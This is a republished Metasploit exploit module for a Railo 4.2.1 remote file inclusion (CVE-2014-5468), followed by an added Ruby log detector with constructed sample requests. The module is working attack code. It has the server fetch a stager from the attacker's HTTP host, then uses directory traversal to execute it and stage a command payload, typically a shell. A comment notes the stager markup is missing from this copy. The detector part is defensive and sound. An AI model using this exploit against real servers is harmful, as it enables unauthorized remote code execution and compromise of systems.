Railo 4.2.1 Remote File Inclusion
Source: metasploit.com  Author: drone  Published: 2014-09-12
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Railo Remote File Include',
      'Description'    => %q{
        This module exploits a remote file include vulnerability in Railo, tested
        against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm
        allows an attacker to download an arbitrary PNG file. By appending a .cfm, and
        taking advantage of a directory traversal, an attacker can append cold fusion
        markup to the PNG file, and have it interpreted by the server. This is used
        to stage and execute a fully-fledged payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bryan Alexander', # Discovery/PoC
          'bperry'           # metasploited
        ],
      'References'     =>
        [
          ['CVE', '2014-5468'],
          ['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
        ],
      'Payload'        =>
        {
          'Space'       => 99999, # if there is disk space, I think we will fit
          'BadChars'    => "",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
            }
        },
      'Platform'       => %w( unix ),
      'Targets'        =>
        [
          [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 26 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
        OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
      ], self.class)
  end

  # Fingerprints the install by hashing a static image shipped with Railo.
  def check
    md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png
    res = send_request_cgi(
      'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif !res.body
      fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
    end

    new_md5 = Rex::Text.md5(res.body)
    return Exploit::CheckCode::Appears if new_md5 == md5
    Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
    end

    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
    @shell_name = Rex::Text.rand_text_alpha(15)
    stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'

    # Two handlers on the module's own HTTP server: one serves the PNG stager,
    # the other serves the final payload that the stager fetches.
    start_service('Uri' => {
      'Proc' => proc do |cli, req|
        on_request_stager(cli, req)
      end,
      'Path' => '/' + stager_name
    })

    start_service('Uri' => {
      'Proc' => proc do |cli, req|
        on_request_shell(cli, req)
      end,
      'Path' => '/' + @shell_name
    })

    wh = '5000' # width and height
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
      'vars_get' => {
        'img'    => url + '/' + stager_name,
        'height' => wh,
        'width'  => wh
      }
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif res.code != 500
      fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
    end

    print_status('Waiting for first stage to download...')
    i = datastore['STAGEWAIT']
    while !@staged && i > 0
      select(nil, nil, nil, 1)
      print_status("Waiting for #{i} more seconds...")
      i = i - 1
    end
    @staged = false

    if i == 0
      fail_with(Failure::Unknown, 'Server did not request the stager.')
    end

    # Railo names the cached thumbnail after the MD5 of "<img url>-<height>-<width>".
    hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET
    hash.upcase!

    print_status('Executing stager')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
      'vars_get' => {
        'attributes.src'        => '../../../../temp/admin-ext-thumbnails/' + hash,
        'thistag.executionmode' => 'start'
      }
    )
  end

  def on_request_shell(cli, _request)
    print_status('Sending payload')
    send_response(cli, payload.encoded, {})
    handler(cli)
  end

  def on_request_stager(cli, _request)
    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name

    stager = ""
    stager << "" # the CFML markup appended here (which referenced url) is missing from this copy of the module; it appears to have been stripped by the site's HTML rendering

    png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
    png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==' # A very small PNG file
    png = Rex::Text.decode_base64(png)

    # Append the stager bytes after the valid PNG so the file passes as an image
    # but still carries markup for the server to interpret.
    stager.each_byte do |b|
      png << b
    end
    png << 0x00

    print_status('Sending stage. This might be sent multiple times.')
    send_response(cli, png, 'Content-Type' => 'image/png')
    @staged = true
    handler(cli)
  end
end
```
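The two requests the module sends (thumbnail.cfm with a remote `img` URL, then img.cfm with a traversal in `attributes.src` into `temp/admin-ext-thumbnails`) are distinctive enough to spot in web-server access logs. The following detector is an added example for defenders and is not part of the Metasploit module or of Railo; the log lines, client addresses, file names and hash value in it are constructed for the example, and the function names `parse_request`, `classify` and `scan_log` are this example's own.

```ruby
require 'cgi'

# Constructed sample access-log lines in combined log format (not real traffic).
# Lines 1-2 mimic the module's two stages; lines 3-4 are ordinary requests.
SAMPLE_LOG = <<~LOG
10.0.0.5 - - [12/Sep/2014:10:01:02 +0000] "GET /railo-context/admin/thumbnail.cfm?img=http://203.0.113.7:8080/abcdefghijklmno.cfm&height=5000&width=5000 HTTP/1.1" 500 1234
10.0.0.5 - - [12/Sep/2014:10:01:15 +0000] "GET /railo-context/admin/img.cfm?attributes.src=..%2F..%2F..%2F..%2Ftemp/admin-ext-thumbnails/0123456789ABCDEF0123456789ABCDEF&thistag.executionmode=start HTTP/1.1" 200 42
10.0.0.9 - - [12/Sep/2014:10:02:00 +0000] "GET /railo-context/admin/thumbnail.cfm?img=/railo-context/res/images/logo.png&height=64&width=64 HTTP/1.1" 200 2048
10.0.0.9 - - [12/Sep/2014:10:02:05 +0000] "GET /index.cfm HTTP/1.1" 200 512
LOG

# Captures client, request target and status from one combined-format line.
REQUEST_RE = /^(?<client>\S+) .*"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# Splits a log line into client, path, decoded query parameters and status.
# Returns nil for lines that do not look like an HTTP request.
def parse_request(line)
  m = REQUEST_RE.match(line)
  return nil unless m
  path, query = m[:target].split('?', 2)
  # CGI.parse percent-decodes values, so an encoded ..%2F shows up as ../
  params = query ? CGI.parse(query) : {}
  { client: m[:client], path: path, params: params, status: m[:status].to_i }
end

# Returns a reason string when the request matches one of the two stages,
# nil otherwise.
def classify(req)
  path = req[:path].downcase
  if path.end_with?('/admin/thumbnail.cfm')
    img = req[:params].fetch('img', []).first.to_s
    # A legitimate thumbnail request names a local resource; a remote scheme in
    # img= is what the vulnerable thumbnail.cfm would fetch from the attacker host.
    if img =~ %r{\A[a-z][a-z0-9+.\-]*://}i
      return 'thumbnail.cfm asked to fetch a remote img URL (CVE-2014-5468 stage 1)'
    end
  elsif path.end_with?('/admin/img.cfm')
    src = req[:params].fetch('attributes.src', []).first.to_s
    # Stage 2 walks out of the expected directory into the thumbnail cache.
    if src.include?('../') || src.include?('admin-ext-thumbnails')
      return 'img.cfm traversal into the thumbnail cache (CVE-2014-5468 stage 2)'
    end
  end
  nil
end

# Scans a whole log text and returns one finding per suspicious request.
def scan_log(text)
  text.each_line.each_with_object([]) do |line, hits|
    req = parse_request(line.chomp)
    next unless req
    reason = classify(req)
    next unless reason
    hits << { client: req[:client], path: req[:path], status: req[:status], reason: reason }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |hit|
    puts "#{hit[:client]} #{hit[:path]} (#{hit[:status]}): #{hit[:reason]}"
  end
end
```

Run against the sample it reports the two staged requests from 10.0.0.5 and ignores the local thumbnail and index requests. Note that the module expects an HTTP 500 on the thumbnail.cfm call, so a 500 on that path with a remote `img` is not a sign the attempt failed; the second-stage img.cfm request from the same client is the stronger indicator, and the decoding step matters because the traversal may arrive percent-encoded.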
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved